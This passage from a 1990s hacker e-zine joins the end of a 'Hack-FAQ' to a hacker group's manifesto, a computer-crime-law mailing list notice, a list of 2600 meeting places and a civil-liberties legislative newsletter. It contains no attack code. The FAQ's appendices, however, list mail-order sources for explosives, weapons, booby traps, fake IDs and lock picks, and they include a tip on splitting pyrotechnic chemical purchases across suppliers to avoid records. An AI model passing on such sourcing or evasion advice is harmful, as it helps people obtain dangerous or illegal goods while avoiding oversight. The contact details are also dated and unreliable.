glis.cr.usgs.gov \ These two sites will give you
martini.eecs.umich.edu 3000 / whatever info you need about any city.


================================================================= ====
Apendix B. Interesting gophers:

gopher.eff.org 5070
gopher.wired.com
techno.stanford.edu
phred.pc.cc.cmu.edu

================================================================= ====
Appendix C. Informative USENET Newsgroups

alt.tcom
alt.forgery
alt.cyberpunk
alt.2600
alt.hackers (need to hack into this one)
alt.security
alt.security.pgp
alt.unix.wizards
misc.security
sci.computer.security
sci.crypt
sci.electronics
rec.pyrotechnics
sci.chem
alt.locksmith

Also try IRC #hack. *** WARNING: May be lame at times!!! ***

================================================================= ====
Appendix D. Publications and Catalogs

2600- a technical journal put out by hackers

mail: email:
2600 2600@well.sf.ca.us
PO Box 752
Middle Island, NY 11953
PH:516-751-2600

----------------------------------------------------------------- ----

PHRACK
The electronic journal of hackers and phreakers.

Email: phrack@well.sf.ca.us

----------------------------------------------------------------- ----

Books

APPLIED CRYPTOGRAPHY: PROTOCOLS, ALGORITHMS, AND SOURCE CODE IN C
Bruce Schneier, 1994, John Wiley & Sons. Comprehensive. VERY well
worth it to anyone into crypto.


Davis, Tenney L.: "Chemistry of Powder and Explosives."


Hogan, Thom: "The Programmer's PC Sourcebook" (Microsoft Press)

Russell: "Computer Security Basics"

Cornwall: "The (New) Hacker's Handbook"

"Cyberpunk" (forget the authors)

----------------------------------------------------------------- ----

Lockpicks
(from Belisarius)

American Systems
2100 Roswell Road
Suite 200C-223
Marietta, GA 30062

Lock Pick Sets
--------------
Novice ($32.50):
11 pix, tension wrenches and a broken key extractor. Pouch.

Deluxe ($54.60):
16 pix, wrenches, extractor. Pocket size leather case.

Superior ($79.80):
32 pix, wrenches,extractor. Hand finished leather case.

----------------------------------------------------------------- ----

Explosives and other underground stuff

Loompanics is one of the major distributers of material relating to
the underground including explosives. You can get the catalogue by
mailing:
Loompanics Unlim
P.O. Box 1197
Port Townsend, Wash 98368

----------------------------------------------------------------- ----

Fake IDs, Technical Manuals on almost anything
(from CyberSorceror)


NIC/LAW ENFORCEMENT SUPPLY
500 Flournoy Lucas Road/Building #3
Post Office Box 5950
Shreveport, LA 71135-5950
Phone: (318) 688-1365 FAX: (318) 688-1367

NIC offers ids of ALL types just about, as well as how-to manuals on
EVERYTHING, posters, lock stuff, electronic sureillance stuff.

----------------------------------------------------------------- ----
Weapons, explosives, survival gear.
(from CyberSorceror)

Phoenix Systems, INC.
P.O. Box 3339
Evergreen, CO 80439
(303) 277-0305

Phoenix offers explosives, grenade launchers, incendiaries, tear gas
grenades, smoke grenades, pen gas sprayers, stun guns up to 120,000
volts, ballistic knives and maces(battering), armored personnel
carriers, saps/batons, booby traps, envelope clearing chemicals ..
turns envelopes transparent until it dries and leaves no marks (used
by postal service and FBI), survival stuff, radiation pills, gasoline
stabilizers for long term storage, emergency supplies, etc, more
how-to books on more illegal stuff than you'd ever have time to read.

----------------------------------------------------------------- ----

Chemicals and lab equipment!! Only requires SIGNATURE for proof of
age!
(from Neurophyre)

Hagenow Laboratories, Inc.
1302 Washington St.
Manitowoc, WI 54220

Send a crisp $1 bill and a request for a catalog. Tip: Don't order
all your pyro stuff from here. They DO keep records. Be safe.


================================================================= ====
Appendix E. PGP keys

Belisarius:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.2

mQCNAi1FJ1MAAAEEALPDEIrmzPazAbkJ2daYnh8fy172tMmHuMPHIMaXdHWLFGjz
+XI8fJR950EGbrMKIIqsb+Xt3qhE+aQLdyggxjUuye+jTHi+JJdNg8VsULW7FvFk
YmFrObd35gQqzu9hFbUZNFxUJaRiEcViNA8bCcjQD5Fn0x/8trRiuxrAgLolAAUR
tApCZWxpc2FyaXVz
=RxKB
-----END PGP PUBLIC KEY BLOCK-----


Neurophyre:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3

mQCrAiw8FYMAAAEE8MHUh1VdCTeNLRr9xfzivxVODmY4Xv1VOzFmA0sCH4tB6aRA
/4+R+nzkW2ZB8N8tOa0tk+S3f20lIoWWPk0M56OaNreT0LLbM9KdOHXE5XDO/mtu
mKdy98eK3fDzXp+vVyK/mo8rhIR4uLcfA1JIuvbBdLa1d/Xq7PEKvayqYXpwvxO6
gLiy72ZWI616ijPttv2QYxSqu7rNSVzEwQy1AAUTtB9Zb3VyIGZsYXYtb3Itcml0
ZSwge05ldXJvcGhpcmV9
=FXdY
-----END PGP PUBLIC KEY BLOCK-----

================================================================= ====

***************************************************************** ****
************************ END OF THE HACK-FAQ! ***********************
***************************************************************** ****
***** Therefore, determine the enemy's plans and you will know ******
***** which strategy will be successful and which will not. ******
***** -- Sun Tzu, The Art of War ******
***************************************************************** ****
***************************************************************** ****


* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #3 of 9

The Pursuit of Knowledge
Notes on The Guild

by Route 9/11/95

You may have been hearing much clamor about the Guild as of late.
Maybe you haven't. It depends what circles you hang out in. This article
is here to tell you who we are and dispell any myths that may be floating
around.


[OverView]

Just what is the Guild? The Guild is a group of individuals that are,
quite simply, dedicated to the pursuit of knowledge. I started the group (see
AKA's, below) as a pet project with a friend of mine (Nihil). Actually, I
started the group as a response to several offers to join other existing
groups. I felt uneasy about most of them, and decided to go out on my own,
and do things the way *I* wanted, the first time. The result is the Guild.
At the time of this writing there are 10 members in the group. We
have had a few members step down, and one who actually just disappeared. We
have even had one person declare a vendetta against me and the Guild for his
denial of acceptance.


[Members]


Some of us are very vocal and 'high profile'. Some of us are not.
Some of us are constant alt.2600 denizens. Some of us do not wish to wade
through such a high traffic group, and prefer others. Some of us only
get online to check email. Some of us are industry professionals, some of us
are students. Some are both. We are of all different backgrounds, talents
and interests. The diversity is the beauty of it all. If we all came from
the same walks of life, did the same things, and liked the same things, we'd
be pretty useless as a group (we'd also be pretty boring). The fact that we
are so diverse and the fact that we *can* organize under a common goal is
saying something right there.
To become a Guild member, all one has to do is fill out the
application you will find at my ftpsite (see URL's below). It is then voted
on by all the current members (Founding members get two votes). We are
rather discriminating, and turn down many people. We do not wish to get too
large, and we do not wish to induct just anyone. It's hard to put a
qualifier on just what we are looking for in members. It's partly what hard
facts we see on the app, and partly gut feeling. If you are serious, feel
free to fill one out, we are always glad to see new applications.


[Axoims]


The creeds we gather under are the following, in order:

1) The pursuit of knowledge
The active and absolute pursuit of gainful and enlightening
information.
2) The right to privacy
The right to be left alone, the right to actively pursue this
privacy through encryption, obscurity, or whatever means
necessary.
3) The right of individualism
The right to stand out in a crowd and show that you are
different, and proud of it. Also, the right to stand on your
own, take responsibility for yourself, and not drop a dime on
your friends and peers, should a three-letter agency press
you.
4) The destruction of ignorance
The dissemination, through discretion, of the acquired
knowledge. The correcting of obvious wrongs of others, and the
ability to concede that you were wrong after evidential proof
of falsehood is provided.
5) The support of fellow members
The supporting, through whatever means necessary, of fellow
members of the Guild.




[Goals and Views]

What are ends to which we gather under? It was my original goal to
get a bunch of people with similar interests together and exchnage thoughts
and ideas. That was my original intent. It has grown beyond that. These
past few months have changed my orginal vision into something much grander.
Being in the Guild means something. It is being able rely on a group of
adroit people to help you out of a situation; whether it be a bit of code
you can't quite seem to get to compile, or an a pesky usenet denizen who
won't leave you alone. Being in the Guild is knowing you have some friends
out there in cyberspace. Friends you can count on. That's what it comes
down to.
One of my personal opinions is one of Freedom of Information.
Information, in it's raw and pure form, wants to be free. I am completely
hypocritical, however. I also beleive in the right to privacy. How do I
justify one to the other? It's my belief that information *does* want to be
free. It tries it's hardest to be widely recognizable and distributable. It
doesn't hide. If you have information you want kept secret, it's *your*
responsibility to make *sure* it *becomes* secret, and *stays* secret. If
there is information I really want private *I* make sure it stays private.
I am charged with it's secrecy. If it was discovered by a hacker, or by some
other means, it's *my* fault for not clipping it's wings well enough...so to
speak...Cryptogrpahy is the great enemy of Freedom of Information. It does a
damn good job of keeping it secure (if implemented correctly). So, to sum it
up, I am a firm advocate of both the Right to Privacy, and the Freedom of
Information. It all depends on what the content is, and how much you want it
secured (how well you can crush it's natural desire to be free).


[What we AREN'T]

In lieu of recent events, some people may have been confused
as to what we are and what we aren't. You should have a pretty decent idea
of what we are. Here's a couple things we AREN'T:

An information-leeching orginization that is only here to gather up
'good stuff' that we couldn't get individually.

Into carding, phreaking, or warez. Translated: we aren't into
getting arrested.

Advocates of mailbombing, usenet spamming, mass mailing-list
subscriptions, etc. Personally, I find certian denial of service
attacks rather interesting. I keep my interests confined to my own
networks and computers, however. If I crash my own computers, it's my
business. If I crash someone else's that's fucked up. We don't do
that. It's childish and inconsisderate, to say the least.



[The Infinity Concept]

The Infinity Concept is our electronic zine. We try to publish it
seasonally...We try that is....It is the personification of creeds 1 and 4.
It is our way of widely disseminating information and aquired knowledge.
Our next issue should be out by mid-October.
It can be found at any of our URL's...





[AKA's]

This roster is current as of 9/4/95


Name AKA Address Joined
----------------------------------------------------------------- ----
Route (Infinity) daemon9@netcom.com Founding
Nihil (Scribe) nihil@nwlink.com Founding
Carbonboy (Scott Walters) carbon@inforamp.net May 1995
Squidge (Timothy R. Matthews) T.R.Matthews@bradford.ac.uk June 1995
Mythrandir(Jeff Thompson) jwthomp@uiuc.edu June 1995
deliryum (Deliryum) deliryum@cdc.net July 1995
Alhambra (Jeremy Rauch) alhambra@jhu.edu July 1995
MrZippy (Robert Fries) rpfries@interaccess.com July 1995
Cheshire (Justin Larue) cheshire@nether.net Aug 1995



[URL's]

url ftp://ftp.netcom.com/pub/da/daemon9/"__the Guild__"
url http://homepage.interaccess.com/~rpfries

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #4 of 9

_ _____ _____
| | /\ / ____| / ____|
| | / \ | | | |
| | / /\ \ | | | |
| |____ / ____ \ | |____ | |____
|______| /_/ \_\ \_____| \_____|

Legal Aspects of Computer Crime

"echo subscribe lacc|mail lacc-request@suburbia.net"

REASONS FOR INCEPTION
---------------------

The growing infusion of computers and computing devices into society
created a legislative and common law vacuum in the 1980's. State
prosecutors attempted to apply traditional property protection and
deception laws to new technological crimes. By and large they were
successful in this endeavor. There were however a very few but well
publicized failed cases against computer "hackers" (most notable R
vs Gold - UK House of Lords).

In an atmosphere of increased government reliance on computer
databases and public fear and hostility towards computerization of
the workplace, the world's legislatures rushed to criminalize
certain types of computer use. Instead of expanding the scope of
existing legislation to more fully encompass the use of computers by
criminals, changing phrases such as "utter or write" to "utter,
write or transmit" (the former being the prosecutions undoing in the
well publicized Gold case) as had been done with the computerization
of copyright law, an entirely new class of criminal conduct was was
introduced. The computer had been seen not just as another tool that
criminals might use in committing a crime but something altogether
foreign and removed from the rest of society and established Law.
The result was a series of nievely drafted, overly broad and
under-defined statutes which criminalized nearly all aspects of
computer use under certain conditions.

In the the 1990's a fundamental and evolving shift in computer usage
has started to occur. At work it is rare now to see a white collar
worker not in the possession of a computer. At home over one third
of households have computer systems. The computer is no longer the
"altogether foreign and removed from the rest of society" device it
once was. It has come out of the domain technical specialist and
into the main stream.

Even our notoriously slow moving legal profession is adopting it as
an essential tool. But there is another change. A qualitative one
important to our discussion.

When you connect hundreds of thousands of computers and thus the
people that use them together you find something remarkable occurs.
An event that you could never have predicted by merely summing the
discrete components involved. A unique virtual society forms. Despite
being designed with computer networking in mind computer crime
legislation copes very poorly with non homogeneous authorization.

Societies are based around a common knowledge of history, beliefs,
and current events. Each member of a society can be pinpointed as
belonging to the society in question by the ideas, beliefs and
knowledge they hold in common with its other members. Any new member
to a society learns this knowledge only because it is passed onto
them; directly by other members or indirectly via its media, works of
literature or observation.

Successful large scale computer networks like the Internet form for
one reason and one reason only; information sharing. When a critical
mass of diversity, interests, user population and information exchange
is reached, a situation develops that mirrors in all important
aspects a vibrant and evolving society. Members of these computer
network societies have nearly equal ability to convey their thoughts
to other members and do so in a timely manner without unwanted
distortion. This is a remarkably democratic process compared to the
very real self censorship and top heavy direction that is so
manifest in traditional broadcast and publishing industries.

But unlike the physical societies that have here-to been the norm,
the electronic network society is not isolationist. It continues to
draw from, mesh and feed its beliefs into the traditional societies
it was populated out of. This coupling process between computer
networks and traditional societies is expected to continue - at
least for English speaking countries, until a stage is reached were
it is difficult to find any boundary between the two.

The majority of citizens will then fall most completely under the
gamut of the appalling drafted computer crimes legislation many
times every day of their lives. In the vast majority of legislation
directed to address computer crime everything which can be performed
on a computer unless "authorized" is defined as illegal. Granted an
individual can authorize themselves to do anything they wish with
their own computer, but in a networked topology a typical computer
user may use or otherwise interact with hundreds or even thousands
of other peoples computers in any given day. In Law it has
previously been the case that which was not expressly forbidden was
permitted. Currently the digital equivalent of moving a chair is
illegal and carries with it in most countries a 5 to 10 year prison
term. It is a sad reflection on the legislature of the day that the
computer medium was criminalized rather than the intent or damage to
to the victem.

It is unlikely that law reform will occur until current political
concern over computer networks such as the Internet is moderated. If
anything the push so far from political drafters has being to once
again introduce brand new medium criminalizing legislation rather
than revitalizing the existing codes. This unfortunate "labeled
arrow" approach will continue as long as there exists an ill
informed and technologically ignorant legislature that finds itself
pliant to the whims of sensationalist media and honed to their
dubious targets.

So ill defined and over broad are the terms used in computer crime
legislation that in most western countries pressing a button on a
silicon wrist watch without permission can be construed as
"insertion of data into a computer without authority" an offence
which carries 10 years penalty in some countries.

It is however within the above unfortunate lack of appropriate
legislation, precedents and judicial guidance that judiciary,
practitioners, prosecutors, law enforcement personnel and drafters
of future codes have to struggle to find resolution.

This list has been created in an attempt to mitigate the lack of
tangible resources people involved with computer crime have at their
disposeal. It is hoped that by bringing together knowledgeable legal
professionals together with para-legal personnel and informed lay
persons that information and resources relevant to the difficult
task of analyzing, presenting in court or otherwise dealing with
computer crime law and computer crimes may be shared and intelligent
discussion stimulated.

nb. this list it is also an appropriate forum to discuss computerized
legal, law enforcement and criminology databases, such as Netmap,
Watson, PROMIS, Lexis, APAIS, CRIM-L, et cetera.

GUIDELINES
----------

In order to keep the semantic content high on this list, please consult
the following before posting:


DO POST DON'T POST
------- ----------

Un/reported decisions. Personal insults.
Commentaries on cases. Signatures >4 lines.
Reviews on relevant books. Quoted replies with more than 30%
Relevant journal articles. quoted from the original.
Information about proposed legislation. Short questions, or questions which
Full text of CC legislation. otherwise do not convey useful
Judicially defined terms. information in their own right.
Articles on new arrests or Gossip about the moderator.
cases. Articles about computer (in)security,
Detailed questions. they should be sent to:
Intelligent commentary. "best-of-security@suburbia.net"
Personal experiences with computer "breaking into a computer is the same
crime. as...."
Very well thought out analogies. Petitions (if you think they are
Relevant transcripts. exceptionally relevant, send them to
Defence or prosecution strategy. the moderator, who may post them).
Relevant papers, thesis. Chain letters.
Conference announcements and details. Advertising material.
Locations of legal resources. Ethical considerations that are only
Computer forensics information. "opinion".
Trial/court dates, verdicts etc. Content free news reports or
Reviews of legal software. articles.
Pointers to any of the above. Abusive, antagonistic or otherwise,
Cross post relevant information from non information rich or constructive
other lists or news groups. phrases.
Relevant affidavits, court documents. Quotes from Dan Quayle.


  
SUBSCRIBING
-----------

Send mail to:

lacc-request@suburbia.net

with the body of:

subscribe lacc

UNSUBSCRIBING
-------------

Send mail to:

lacc-request@suburbia.net

with the body of:

unsubscribe lacc

POSTING
-------

To send a message to the list, address it to:

lacc@suburbia.net

REPLYING
--------

If you are replying to a message already on the LACC list using your
mail programs reply facility you will almost certainly have to change
the reply address to lacc@suburbia.net. This is because the LACC mailing
list program is configured to have return replies sent no "nobody" in
order to avoid receiving the replies of "vacation" programs which
automatically send email saying "I've gone to the moon for two weeks to
hunt rare bits"
.

--
+----------------------------------+----------------------------- ------------+
| Julian Assange | "if you think the United States has |
| | has stood still, who built the largest |
| proff@suburbia.net | shopping centre in the world?"
- Nixon |
+----------------------------------+----------------------------- ------------+
* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File#5 of 9

2600 MEETINGS


North America

Ann Arbor, MI
Galleria on Souh University

Austin
Northcross Mall, across the skating rink from the food court, next
to Pipe World.

Baltimore
Baltimore Inner Harbor, Harborplace Food Court, Second Floor,
across
from the Newscenter, Payphone: (410) 547-9361.

Baton Rouge, LA
In The LSU Union Building, between the Tiger Pause and Swensen's
Ice Cream, next to the payphone. Payphone numbers:(504) 387-9520
9520, 9538, 9618, 9722, 9733, 9735.

Bloomington, MN
Mall of America, north side food court, across from Burger King
and
the bank of payphones that don't take incoming calls.

Boise, ID
Student Union building at Boise State University near payphones.
Payphone number:(208) 342-9432, 9559, 9700, 9798

Boston, MA
Prudential Center Plaza, Terrace Food Court, Payphones:(617) 236-
6582, 6583, 6584, 6585.

Chicago, IL
3rd Coast Cafe, 1260 North Dearborn.

Cincinnati
Kenwood Town Center, food court.

3 Clearwater, FL
Clearwater Mall, near the food court. Payphones:(813) 796-9706,
9707, 9708, 9813.

Cleveland
CoventryAraica in Cleveland Heights

Dallas
Mama's Pizza, northeast corner of Campbell Rd. and Preston Rd. in
North Dallas, first floor of the two story strip section. 7pm.
Payphone:(214) 931-3850.

Danbury, CT
Danbury Fair Mall, off Exit 4 of I-84, in food court. Payphones:
(203) 748-9995

Hazelton, PA
Lural Mall in the new section by phones. Payphones:(717) 454-9236,
9246,9365.

4 Houston
Galleria Mall, 2nd story overlooking the skating rink.

Kansas City
Foor Court at the Oak Park Mall in Overland Park, Kansas.

Los Angeles
Union Station, corner of Macy & Alameda. Inside main entrance by
bank of phones. Payphones:(213) 972-9358,9388, 9506, 9519, 9520,
625-9923, 9924; 614-9849, 9872, 9918, 9926.

Louisville, KY
The Mall, St. Matthew's food court.

Madison, WI
Union South (227 S. Randall St.) on the main level by the
payphones
Payphones: (608) 251-9746, 9914, 9916, 9923.

Nashville
Bellevue Mall in Bellevue, in the food court.

New York City
Citicorp Center, in the loby, near the payphones, 153 E 53rd St.,
between Lexington & 3rd. Payphones: (212) 223-9011, 8927; 308-
8044, 8162

Ottawa, ONT (Canada)
Cafe Wim on Sussex, a block down from Rideau Street. 7pm.

Philadephia
30th Streek Amtrak Station at 30th & Market, under the "Stairwell
7"

sign. Payphones (215) 222-9880, 9681, 9779, 9799, 9632; 387-9751.

Pittsburgh
Parkway Center Mall, south of downtown, on Route 279. In the food
courth. Payphone: (412)928-9926, 9927, 9934.

Portland, OR
Lloyd Center Mall, second leavel at the food court.

6 Poughkeepsie, NY
South Hills Mall, off Route 9. By the payphones in front of Radio
Shack, next to the food court.

Raleigh, NC
Crabtree Valley Mall, food court.

Rochester, NY
Marketplace Mall food court.

St. Louis
Galleria, Highway 40 and Brentwood, lower level, food court area,
by the theatres.

Sacramento
Downtown Plaza food court, upstairs by the theatre. Payphones:
(916) 442-9543, 9644.

San Fransico
4 Embarcadero Plaza(inside). Payphones: (415) 398-9803, 9804,
9805, 9806.

Seattle
Washinton State Covention Center, first floor. Payphones: (206)
220-9774, 9775, 9776, 9777.

Washington DC
Pentagon City Mall in the food court.

Europe & South America


Buenos Aires, Argetina
In the bar at San Jose 05.

London, England
Trocadero Shopping Center (near Picadilly Circus)next to VR
machines. 7pm to 8pm.

Munich, Germany
Hauptbahnhof (Central Station), first floor, by Burger King and
the
payhpones.(one stop on the S-Bahn from Hackerbruecke -
Hackerbridge!) Birthplace of Hacker-Pschorr beer. Payphones: +49-
89-591-835. +49-89-558-541, 542, 543, 544, 545.

Granada, Spain
At Kiwi Pub in Pedro Antonio de Alarcore Street.

Halmstad, Sweden
At the end of the town square(Stora Torget), to the right of the
bakery
(Tre Hjartan). At the payphones.

All meetings take place on the first Friday of the month from
approximately 5pm to 8pm local time unless otherwise noted. To start
a meeting in your city, leave a message and phone number at
(516)751-2600, or send email to: meetings@2600.com


This PHiLe courtesy of the 2600 Web Site

FuSIoN

----------------------------------------------------------------- -------------
T H E C R i M E S Y N D i C A T E
NPi/TcS/SUi

fu-sion \'fyu-zhen\ n, the union of atomic nuclei resulting in the
release of enormous quantities of energy when certain light elements unite.
----------------------------------------------------------------- -------------


* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #6 of 9

================================================================= ==========
BillWatch 18

VTW BillWatch: A weekly newsletter tracking US Federal legislation
affecting civil liberties. BillWatch is published every
Friday evening as long as Congress is in session.

Congress is: in session

Issue #18, Date: Sun Sep 17 16:36:37 EDT 1995

Please widely redistribute this document with this banner intact
Redistribute no more than two weeks after above date
Reproduce this alert only in relevant forums

Distributed by the Voters Telecommunications Watch (vtw@vtw.org)
_________________________________________________________________ __________

TABLE OF CONTENTS

'-' denotes quiet issue (no movement this week)
'+' denotes movement this week on an issue
'++' denotes movement this week with an action for YOU to do

+ Summary of Internet Censorship legislation
+ Changes in US policy on cryptography
Review of workshop at NIST Sep 15th
Text of ACLU position on encryption
Status: "Clipper II" ramrodding is progressing
- HR1978, S n.a. (Internet Freedom and Family Empowerment Act)
Status: In conference
- HR1004, S314 (1995 Communications Decency Act)
Status: In conference
- HR n.a., S714 (Child Protection, User Empowerment, and Free
Expression in Interactive Media Study Act)
Status: In conference
- Last-minute provisions of the Manager's Mark amendment to HR1555
Status: In conference
- HR n.a., S892 (Protection of Children from Computer Pornography Act)
Status: In committee
- HR n.a., S974 (Anti-Electronic Racketeering Act)
Status: In committee
+ HR n.a., S1237 (Child Pornography Prevention Act
Text of S1237
Statement of introduction of S1237 (Hatch)
Status: In committee (Judiciary)

- Subscription Information

_________________________________________________________________ __________
SUMMARY OF INTERNET CENSORSHIP LEGISLATION

The four different pieces of legislation that address Internet regulation
are still waiting for conference committee consideration. With the budget
as the current Congressional priority, it isn't likely the fate of the
Internet will be considered for several weeks.

VTW is still collecting the signatures of businesses and bulletin boards
that wish to participate in the joint letter to be sent to Congress urging
parental control (instead of censorship) as a means of approaching the
Internet. VTW urges you to contact your Internet service provider along
with any business that use the Internet to signon to this letter. Details
can be found at the http://www.vtw.org/cdaletter/
or by sending mail to vtw@vtw.org with "send cdaletter" in the subject line.

_________________________________________________________________ __________
CHANGES IN US CRYPTOGRAPHY POLICY

VTW has been chronicaling the government's attempts at forcing Clipper II
onto the public and industry. Of course, it is still extremely unpopular.
At the Sep. 6th and 7th NIST workshop, industry and public interest
groups panned the plan and small working groups setup by NIST to evaluate
the criteria unhappily participated, even openly revolting in some instances.

On Sep 15th, NIST held another workshop to discuss the FIPS (Federal
Information Processing Standard) that would embody Clipper II (also
know as Commercial Key Escrow). Believe it or not, this meeting was not
a repeat of the Sep 6th/7th meeting. Several attendees noticed significant
differences:

HEIGHTENED GOVERNMENT PRESENCE
At the Sep 6th/7th workshop, dissent among industry and public
representatives interfered with NIST's attempts at having a discussion
about the specifics of Clipper II. Simply put, industry and the public
advocates didn't like the plan. Therefore discussions of the details
were fruitless. One smaller working group simply refused to work on
the details and issued a statement condemning the whole Clipper II plan.

The government upped the number of Federal participants at the Sep. 15th
meeting in order to prevent the repeat of such an event. Several public
advocates noticed a high percentage of government-provided participants in
the working groups. One civil liberties advocate noted that he had never
seen so many NSA individuals identifying themselves in public before.

Needless to say the tactic worked. Little in the way of opposition to
the plan was voiced.

BURNOUT AMONG INDUSTRY AND PUBLIC REPRESENTATIVES
Having been through this Kafka-esque exercise a mere two years ago with
the original Clipper plan, industry and public advocates are showing
signs of burnout. It's fairly clear that their concerns are not being
listened to. Both the public and the industry clearly sent a message to
the Clinton Administration when the original Clipper was proposed.
Said F. Lynn McNulty of NIST in the New York Times Magazine (6/12/94), "We
received 320 comments, only 2 of which were supportive."


NIST made the Clipper Chip a government standard anyway, and it flopped
in the marketplace. How many of those Clipper-phones do you see running
around? The government's so-called "stupid criminals" are just falling
over themselves to buy them, aren't they? NIST has stated that it has
already been decided to make Clipper II a standard, before receiving any
public input. Is this how democracy is supposed to work?

COMMERCIAL CHEERLEADING FROM SELECT INDUSTRY INDIVIDUALS
If you're wondering how the Clinton administration can get away with
pushing such a disastrous proposal again, look no further than select
members of the hardware and software industry. Several companies that
make both security software, hardware devices and several key escrow
companies are pushing Clipper II because they incorrectly believe that
the government will not make it mandatory, and because they believe
the industry wants key escrow.

VTW believes they have it half-right: industry wants key escrow, though
not on the Clinton Administration's terms. It is clear, however, that
the Administration will not allow key-escrow to be a voluntary program.

The EPIC (Electronic Privacy Information Center) has proved that the
government has enough common sense to know that key escrow is going to be
unpopular and will have to be forced on the marketplace. (See FOIA'd
documents at URL:http://www.epic.org/crypto/).

Never the less, several companies who want to produce hardware key
escrowed devices, key escrowed software, and become escrow holders have
become the champions of the Clipper II (Commercial Key Escrow)
program. With their support, VTW predicts that the Clinton
Administration will ratify Clipper II as a FIPS standard over the
objections of industry and public.

Stay tuned to BillWatch for progress on Clipper II.
_________________________________________________________________ __________

Internet Freedom and Family Empowerment Act (HR 1978, S n.a.)

*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
HR 1978 is an attempt to recognize the unique medium that is
online systems and avoid legislating censorship. It would:
-prohibit the FCC from regulating constitutionally-protected
online speech
-absolve sysops and services from liability if they take
good faith measures to screen their content or provide
parental-screening software

See directions below for obtaining analyses from various
organizations.

House sponsors and cosponsors: Cox (R-CA), Wyden (D-OR), Matsui (D-CA),
White (R-WA), Stupak (D-MI), Rohrabacher (R-CA)

House status:
HR 1978 was passed 8/4/95 by the House in a vote (421-4).

Where to get more info:
Email: vtw@vtw.org (with "send hr1978" in the subject line)
Gopher: gopher -p 1/vtw/exon gopher.panix.com
WWW: http://www.panix.com/vtw/exon

_________________________________________________________________ __________

1995 COMMUNICATIONS DECENCY ACT (CDA) (Passed Senate, HR 1004)

*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
The CDA would criminalize electronic speech currently protected
in print by the First Amendment.

House CDA sponsors: Johnson (D-SD)

House status:
HR1004 will probably never leave committee.

Senate status:
The Senate affirmed the Communications Decency Act (84-16)
as amended to the Telecommunications Reform bill (S 652).

Where to get more info:
WWW: http://www.panix.com/vtw/exon
http://www.eff.org/
http://www.cdt.org/
http://epic.org/free_speech
Gopher: gopher -p 1/vtw/exon gopher.panix.com
gopher gopher.eff.org
Email: vtw@vtw.org (with "send cdafaq" in the subject line)
cda-status@cdt.org
cda-info@cdt.org

_________________________________________________________________ __________
Child Protection, User Empowerment, and Free Expression in Interactive
Media Study Act (Amendment to HR1555 in the House, S 714)

*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
Would direct the Department of Justice to study whether current
law is sufficient to cover enforcement of existing obscenity
laws on computers networks.

Senate sponsors: Leahy (D-VT)

Senate status:
Currently unattached to any legislation; attempted attachment to
S.652 but failed (6/14/95).

House sponsors: Klink (D-PA)

House status:
Amended to HR 1555 in committee.

_________________________________________________________________ __________

Last-minute provisions of the Manager's Mark amendment to HR1555 (added to
HR1555 at the last minute)

*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
Criminalizes many forms of constitutionally-protected speech
when they are expressed online.

House sponsors: Unknown

House status:
Amended to HR 1555 through the Manager's Mark on 8/4/95.

_________________________________________________________________ __________

1995 Protection of Children from Computer Pornography Act (S 892)

Description:
Would make Internet Service Providers liable for shielding
people under 18 from all indecent content on the Internet.

Senate sponsors: Dole (R-KS), Coats (R-IN), Grassley (R-IA), McConnell (R-KY),
Shelby (R-AL), Nickles (R-OK), Hatch (R-UT)

Senate status:
A hearing was held Monday July 24th. No action on the bill
has happened yet as a result of that hearing.

_________________________________________________________________ __________

Anti-Electronic Racketeering Act of 1995 (HR n.a., S 974)

Description:
S 974 has many effects (not good) on law enforcement's use of
intercepted communications. It would also make it unlawful for
any person to publicly disseminate encoding or encrypting
software including software *currently allowed* to be exported
unless it contained a "universal decoding device". This
more than likely means that Clipper-style key escrow systems
could be disseminated, but not strong, private cryptography.

Senate sponsors: Grassley (R-IA)

Senate status: Currently not active and probably won't move before the
August recess.

Senate citizen action required:
Request bill below and familiarize yourself with it. VTW is
tracking this bill, and will alert you when there is movement.
There is no Congressional action to take right now; as other
bills (such as the Communications Decency Act) pose a greater,
more immediate threat.

House of Representatives status: No House version is currently enrolled.

Where to get more info:
Email: vtw@vtw.org (with "send s974" in the subject line)
Gopher: URL:gopher://gopher.panix.com:70/11/vtw/


_________________________________________________________________ __________
Child Pornography Prevention Act of 1995 (HR n.a., S 1237)
Description:
S 1237 would criminalize material that depicts children engaging
in sexually-explicit conduct whether or not the material was
produced with children or entirely without computer.

Senate sponsors:
Hatch (R-UT), Abraham (R-MI), Grassley (R-IA), Thurmond (R-SC)

Senate status: In the Judiciary committee, no hearing has been held yet

Senate citizen action required:
Read the bill below and familiarize yourself with it. VTW is
tracking this bill, and will alert you when there is movement.

House of Representatives status: No House version is currently enrolled.

Where to get more info:
Check URL:http://thomas.loc.gov and search for bill S1237. VTW
will have a homepage on this bill soon. We've included both
the text of the bill and Congressional debate on it below.


To amend certain provisions of law relating to child pornography,
and for other purposes.
IN THE SENATE OF THE UNITED STATES
September 13 (legislative day, September 5), 1995
Mr. Hatch (for himself, Mr. Abraham, Mr. Grassley, and Mr.
Thurmond) introduced the following bill; which was read twice
and referred to the Committee on the Judiciary
A BILL
To amend certain provisions of law relating to child pornography,
and for other purposes.
Be it enacted by the Senate and House of Representatives of the
United States of America in Congress assembled,
SECTION 1. SHORT TITLE.
This Act may be cited as the `Child Pornography Prevention Act of
1995'.
SEC. 2. FINDINGS.
Congress finds that--
(1) the use of children in the production of sexually
explicit material, including photographs, films, videos,
computer images, and other visual depictions, is a form of
sexual abuse which can result in physical or psychological
harm, or both, to the children involved;
(2) child pornography permanently records the victim's abuse,
and its continued existence causes the child victims of sexual
abuse continuing harm by haunting those children in future years;
(3) child pornography is often used as part of a method of
seducing other children into sexual activity; a child who is
reluctant to engage in sexual activity with an adult, or to
pose for sexually explicit photographs, can sometimes be
convinced by viewing depictions of other children `having fun'
participating in such activity;
(4) prohibiting the possession and viewing of child
pornography encourages the possessors of such material to
destroy them, thereby helping to protect the victims of child
pornography and to eliminate the market for the sexually
exploitative use of children; and
